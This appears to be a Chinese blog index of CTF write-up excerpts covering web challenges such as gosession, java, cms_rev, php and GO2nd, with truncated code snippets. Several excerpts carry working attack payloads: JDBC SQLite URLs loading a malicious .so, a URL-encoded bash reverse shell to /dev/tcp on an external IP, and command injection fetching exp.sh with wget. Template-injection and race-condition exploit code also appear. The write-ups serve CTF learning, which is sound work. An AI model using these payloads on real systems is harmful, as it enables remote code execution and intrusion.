MoonlitSyntax - 月光下的轻语

EzHttp

发表于2024-06-07 | Writeup

一个点是 $_SERBER[HTTP_X]是传headerX

发表于2024-06-07 | Writeup

noumisotuitennnoka

noumisotuitennnoka

发表于2024-06-07 | Writeup

关键点请从my开始看 $dir -> /tmp$subdir -> /$jsons$jsonDir -> /tmp/$jsons$escapeDir -> /var/www/html/$jsons$archiveFile -> /tmp/$jsons/archive.zip/tmp/$jsons/backdoor.php/tmp/$jsons/.htaccess$dev_dir -> 默认/tmp 可选$ 额,变量太多了,直接找吧,貌似是这个利用点,但是为什么还是forbidden呢,环境还有么唉 <?php$file = 'foo-bar';touch($file);$zip = new ZipArchive();$zip->open('test.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);$options = array('add_path' => 'prefix-', 'remo ...

gosession

发表于2024-06-07 | Writeup

首先是修改文件,启动服务获取admin的session (无痕浏览器,爱死你了) 之后是个pongo2模版注入首先是X1r0z的 // UserAgent returns the client's User-Agent, if sent in the request.func (r *Request) UserAgent() string { return r.Header.Get("User-Agent")} /admin?name={{c.SaveUploadedFile(c.FormFile(c.Request.UserAgent()),c.Request.UserAgent())}} 还有一个大头师傅的 /admin?name={%set form=c.Query(c.HandlerName|first)%}{%set path=c.Query(c.HandlerName|last)%}{%set file=c.FormFile(form ...

reading

发表于2024-06-07 | Writeup

import osimport mathimport timeimport hashlibfrom flask import Flask, request, session, render_template, send_filefrom datetime import datetimeapp = Flask(__name__)app.secret_key = hashlib.md5(os.urandom(32)).hexdigest()key = hashlib.md5(str(time.time_ns()).encode()).hexdigest()books = os.listdir('./books')books.sort(reverse=True)@app.route('/')def index(): if session: book = session['book'] page = session['page'] page_size = sessio ...

cms

发表于2024-06-07 | Writeup

系统API里面有qrcode 传参数ssrf打flag.php

java

发表于2024-06-07 | Writeup

{"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/evil.db","tableName":"trigger_action_table"} {"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/hack.so"} 不是哥们,赛后出题啊哥们 #define _GNU_SOURCE#include <stdlib.h>#include <stdio.h>#include <string.h>__attribute__ ((__constructor__)) void preload (void){ system("curl 165. ...

cms_rev

发表于2024-06-07 | Writeup

如果是图片会发生两次请求,如果非图片第一次访问和第二次访问的http状态码也不同,也能看出来 from flask import Flask, redirect, send_from_directoryapp = Flask(__name__)flag = 0@app.route('/')def example_redirect(): global flag if flag != 0: return redirect('http://127.0.0.1/flag.php?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%36%35%2e%31%35%34%2e%35%2e%32%32%31%2f%39%39%39%39%20%3c%26%31%27', code=302) else: flag += 1 re ...

php

发表于2024-06-07 | Writeup

\ php -r eval\(hex2bin\(substr\('_6c73',1\)\)\)\; 去掉\ 从别人博客上拔下来的,竞争 import requestsimport threadingimport re url = "url" proxies = {"http": None} def upoadFile(): file = {"files": open("e.php")} data = {"cmd": "du -a /"} res = requests.post(url, files=file, data=data) r = re.findall("(/tmp/php.*)", res.text) # print(r) if r and r[0] != '' and r[0] != '/tm ...

sanic

发表于2024-06-07 | Writeup

python原型链首先设置cookie 分号用adm\073n \073绕过

Craft CMS

发表于2024-06-07 | Writeup

import requestsimport reimport sysheaders = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"}def writePayloadToFile(tmpDir): data = { "action": "conditions/render", "configObject": "craft\elements\conditions\ElementCondition", "config": '{"name":"configObject","as &qu ...

GO2nd

发表于2024-06-07 | Writeup

唉,我啊,太不自信了 CVE-2021-42740分析文章 `:`something``:# 变成： `:\`something\``:\# http://localhost:3333/checker?url=127.0.0.1:`:`wget$IFS\http://165.154.5.221/exp.sh$IFS\-O$IFS/tmp/s.sh``:` 然后chmod +x /tmp/s.sh http://localhost:3333/checker?url=127.0.0.1:`:`chmod$IFS\777$IFS\/tmp/s.sh``:` 把 `:`something``:# 当成` 把 $IFS\ 当成space